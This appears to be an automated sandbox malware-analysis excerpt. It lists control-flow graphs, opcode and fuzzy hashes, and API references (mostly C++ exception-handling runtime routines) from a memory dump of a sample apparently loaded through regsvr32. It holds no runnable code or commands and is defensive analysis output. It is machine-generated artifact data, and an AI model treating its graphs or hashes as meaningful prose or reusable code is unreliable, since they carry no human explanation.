                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                                                                  • Opcode ID: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                                                                                                                                                                                                                                                                                                  • Instruction ID: 657e981fe50b2286da78c2f715837a3c7127fc7551b3ba8142dc5105ad97cad6
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8baff4eaddff286641c296b0cc926b9b4bc7b24fb057b1799d8bb4c2e678a60
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C8E1AF30A18B088FDBA4EF69C4856AAB7E1FF98314F50065FD55AD7315DB34E481CB82

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 997 24f6608-24f6a58 call 24ee464 call 24ee560 1003 24f6a5a-24f6a60 997->1003 1004 24f6a92-24f6a96 997->1004 1003->1004 1007 24f6a62-24f6a64 1003->1007 1005 24f6a9c-24f6aa0 1004->1005 1006 24f6b2a-24f6b2e 1004->1006 1008 24f6aa6-24f6aae 1005->1008 1009 24f6c21 1005->1009 1012 24f6b72-24f6b78 1006->1012 1013 24f6b30-24f6b3c 1006->1013 1010 24f6a76-24f6a78 1007->1010 1011 24f6a66-24f6a6a 1007->1011 1008->1009 1016 24f6ab4-24f6ab8 1008->1016 1021 24f6c26-24f6c40 1009->1021 1010->1004 1020 24f6a7a-24f6a86 1010->1020 1019 24f6a6c-24f6a74 1011->1019 1011->1020 1017 24f6b7a-24f6b7e 1012->1017 1018 24f6be8-24f6c18 1012->1018 1014 24f6b3e-24f6b42 1013->1014 1015 24f6b52-24f6b5e 1013->1015 1014->1015 1023 24f6b44-24f6b50 call 24f1468 1014->1023 1015->1009 1025 24f6b64-24f6b6c 1015->1025 1026 24f6aba-24f6abc 1016->1026 1027 24f6b17-24f6b25 call 24f10fc 1016->1027 1017->1018 1028 24f6b80-24f6b87 1017->1028 1018->1009 1024 24f6c1c call 24f6c48 1018->1024 1019->1004 1019->1010 1020->1004 1022 24f6a88-24f6a8c 1020->1022 1022->1004 1022->1009 1023->1012 1023->1015 1024->1009 1025->1009 1025->1012 1030 24f6abe-24f6ad0 call 24f5de0 1026->1030 1031 24f6af5-24f6af7 1026->1031 1027->1009 1028->1018 1032 24f6b89-24f6b91 1028->1032 1041 24f6c41-24f6c47 call 24ee49c 1030->1041 1044 24f6ad6-24f6ad9 1030->1044 1031->1027 1036 24f6af9-24f6b01 1031->1036 1032->1018 1037 24f6b93-24f6ba6 call 24f1494 1032->1037 1040 24f6b07-24f6b0b 1036->1040 1036->1041 1037->1018 1050 24f6ba8-24f6be6 1037->1050 1040->1041 1045 24f6b11-24f6b15 1040->1045 1044->1041 1048 24f6adf-24f6ae3 1044->1048 1049 24f6ae5-24f6af0 call 24f5ee4 1045->1049 1048->1049 1049->1009 1050->1021
APIs
• __except_validate_context_record.LIBVCRUNTIME ref: 024F6A38
• __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 024F6B20
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
• String ID: csm$csm
• API String ID: 3896166516-3733052814
• Opcode ID: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
• Instruction ID: 355f1aea7b79f26529bb4e029fe2b1867ab66d20d8cfcdd3e9798b61cc9aa3e0
• Opcode Fuzzy Hash: b5fe93b38fdbb449a8dcda3059ceade28013aff72cb2c9cf4c45be8ccc589a34
• Instruction Fuzzy Hash: B461D030618B498FCBA8DF288084326B7E5FBD8315F65865FDAA9C7755DB30D881CB42

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1111 24f6750-24f677b 1112 24f677d-24f678a call 24f1468 1111->1112 1113 24f678c-24f6790 1111->1113 1115 24f6792-24f6795 1112->1115 1113->1115 1117 24f679b-24f679e 1115->1117 1118 24f6912 1115->1118 1119 24f67b1-24f67b2 1117->1119 1120 24f67a0-24f67af call 24f1468 1117->1120 1121 24f6914-24f692d 1118->1121 1123 24f67b4-24f67b8 1119->1123 1120->1123 1123->1118 1125 24f67be-24f67c1 1123->1125 1126 24f67cb-24f67cd 1125->1126 1127 24f67c3-24f67c5 1125->1127 1128 24f67cf-24f67d7 1126->1128 1129 24f67d9-24f67dc 1126->1129 1127->1118 1127->1126 1128->1129 1130 24f67de-24f67e2 1129->1130 1131 24f6810-24f6813 1129->1131 1130->1131 1132 24f67e4-24f67ee 1130->1132 1133 24f6815-24f682e 1131->1133 1134 24f6830-24f6834 1131->1134 1132->1131 1135 24f67f0-24f67f9 1132->1135 1146 24f686f-24f687b call 24ece40 1133->1146 1137 24f6836-24f685d call 24f9d30 1134->1137 1138 24f6880-24f6884 1134->1138 1149 24f67ff-24f6802 1135->1149 1150 24f692e-24f6970 call 24ee49c * 2 1135->1150 1162 24f690e-24f6910 1137->1162 1163 24f6863-24f6866 1137->1163 1139 24f6886-24f6893 call 24f1494 1138->1139 1140 24f6895-24f6898 1138->1140 1145 24f689a-24f689d 1139->1145 1140->1145 1152 24f689f-24f68d1 call 24ece40 call 24f9d30 1145->1152 1153 24f68d3-24f68e0 1145->1153 1146->1162 1149->1150 1159 24f6808-24f680e 1149->1159 1180 24f6977-24f697c 1150->1180 1181 24f6972-24f6975 1150->1181 1152->1162 1168 24f68f3-24f68f4 1153->1168 1169 24f68e2-24f68f1 call 24f1494 1153->1169 1159->1146 1162->1121 1163->1162 1167 24f686c-24f686d 1163->1167 1167->1146 1174 24f68f6-24f690a 1168->1174 1169->1174 1174->1162 1182 24f697e-24f6986 call 24f6750 1180->1182 1181->1182 1185 24f6988-24f698b 1182->1185 1186 24f69c4-24f69d7 call 24ece40 1182->1186 1188 24f698d-24f69a0 call 24ece40 1185->1188 1189 24f69f4-24f6a09 1185->1189 1192 24f69d9-24f69e3 call 24f1494 1186->1192 1193 24f69e5-24f69f3 call 24f62f4 1186->1193 1197 24f69ae-24f69c2 call 24f6300 1188->1197 1198 24f69a2-24f69ac call 24f1494 1188->1198 1192->1193 1193->1189 1197->1189 1198->1197
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: AdjustPointer
• String ID:
• API String ID: 1740715915-0
• Opcode ID: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
• Instruction ID: 86769753040310155e8062292c69b6b1ca8c442cfd933ea69fd2cf4647a8d4f6
• Opcode Fuzzy Hash: af3458985603ad7ce2524011c1902c71dc37048d60be4bde5190f5d8f215ae27
• Instruction Fuzzy Hash: A2810730119E1A8FDBADEF6D8050676B3E5FBD8314B66066FC96AC3255DB30D881CB81

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 1205 24ecb50-24ecb96 call 24ee464 1208 24ecb9c-24ecba6 1205->1208 1209 24ecc8d-24ecc94 1205->1209 1210 24ecc79-24ecc7b 1208->1210 1211 24ecd38-24ecd3e 1209->1211 1212 24ecbab-24ecbb9 1210->1212 1213 24ecc81 1210->1213 1214 24ecc99-24ecca7 1211->1214 1215 24ecd44 1211->1215 1216 24ecbbf-24ecbc6 1212->1216 1217 24ecc77 1212->1217 1213->1215 1218 24eccad-24eccb5 1214->1218 1219 24ecd36 1214->1219 1220 24ecd49-24ecd66 1215->1220 1216->1217 1221 24ecbcc-24ecbd1 1216->1221 1217->1210 1218->1219 1222 24eccb7-24eccbb 1218->1222 1219->1211 1221->1217 1223 24ecbd7-24ecbdc 1221->1223 1224 24eccfc-24ecd0d 1222->1224 1225 24eccbd-24eccc2 1222->1225 1226 24ecbde-24ecbf1 1223->1226 1227 24ecbf9-24ecbff 1223->1227 1228 24ecd1f-24ecd33 1224->1228 1229 24ecd0f-24ecd15 1224->1229 1230 24eccf8-24eccfa 1225->1230 1231 24eccc4-24eccd0 1225->1231 1244 24ecc86-24ecc88 1226->1244 1245 24ecbf7 1226->1245 1235 24ecc29-24ecc72 call 24ee430 call 24ee460 1227->1235 1236 24ecc01-24ecc09 1227->1236 1228->1219 1229->1219 1234 24ecd17-24ecd1b 1229->1234 1230->1215 1230->1224 1232 24eccd2-24eccd9 1231->1232 1233 24eccf1-24eccf6 1231->1233 1232->1233 1237 24eccdb-24ecce4 1232->1237 1233->1230 1233->1231 1234->1215 1240 24ecd1d 1234->1240 1235->1217 1236->1235 1241 24ecc0b-24ecc19 call 24ee3b0 1236->1241 1237->1233 1242 24ecce6-24eccef 1237->1242 1240->1219 1241->1235 1249 24ecc1b-24ecc21 1241->1249 1242->1230 1242->1233 1244->1220 1245->1217 1245->1227 1249->1235
APIs
• __except_validate_context_record.LIBVCRUNTIME ref: 024ECB7B
• _IsNonwritableInCurrentImage.LIBCMT ref: 024ECC12
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
• Opcode ID: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
• Instruction ID: 21f65210704287dbfd364e03c5236da98d969685ad8826d8c70d72d2b85a8a15
• Opcode Fuzzy Hash: 28f9c21a248c6750ff56b9987a7044b6f6882288d8c0aceccd40688c18a955a4
• Instruction Fuzzy Hash: 2A61E530208A088BEF28EF5CD4C5A7977D1FB45356B10456FE887C3266EB35E891CB85

                                                                                                                                                                                                                                                                                                  Control-flow Graph

control_flow_graph 1251 24f71ec-24f721f 1252 24f7438-24f7452 1251->1252 1253 24f7225-24f7247 call 24ee560 1251->1253 1256 24f7249-24f725d call 24ee560 1253->1256 1257 24f72a4-24f72b6 1253->1257 1256->1257 1268 24f725f-24f7265 1256->1268 1258 24f72bc-24f7300 call 24f1334 1257->1258 1259 24f7453-24f745b call 24ee49c 1257->1259 1258->1252 1267 24f7306-24f7311 1258->1267 1269 24f7318-24f7353 1267->1269 1268->1257 1270 24f7267-24f726d 1268->1270 1271 24f7359-24f7365 1269->1271 1272 24f7417-24f7432 1269->1272 1270->1257 1273 24f726f-24f729e call 24f15d8 1270->1273 1271->1272 1274 24f736b-24f7390 1271->1274 1272->1252 1272->1269 1273->1252 1273->1257 1276 24f73c3-24f73c6 1274->1276 1277 24f7392-24f739e call 24f1468 1274->1277 1276->1272 1280 24f73c8-24f7412 call 24f7118 1276->1280 1283 24f73bb-24f73bc 1277->1283 1284 24f73a0-24f73a3 1277->1284 1280->1272 1283->1276 1285 24f73a5-24f73b1 call 24f1468 1284->1285 1286 24f73b3 1284->1286 1288 24f73b5-24f73b9 1285->1288 1286->1288 1288->1272 1288->1283
APIs
• _CallSETranslator.LIBVCRUNTIME ref: 024F7297
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2270841882.00000000024B1000.00000040.00001000.00020000.00000000.sdmp, Offset: 024B1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_24b1000_regsvr32.jbxd
Yara matches
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
• Opcode ID: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
• Instruction ID: c3e4cbe0eab8ada18c52ffa91b718d82f5baf51e994775c43004aed6bd6e0cea
• Opcode Fuzzy Hash: 2b0857dc7f466c401f9652ed94ee3215145e256993a502d5bc3a495471cbec0f
• Instruction Fuzzy Hash: A5717E30518B488FDBA5EF1CC446BAAB7E0FBD9314F044A5EE589C3211DB78E581CB86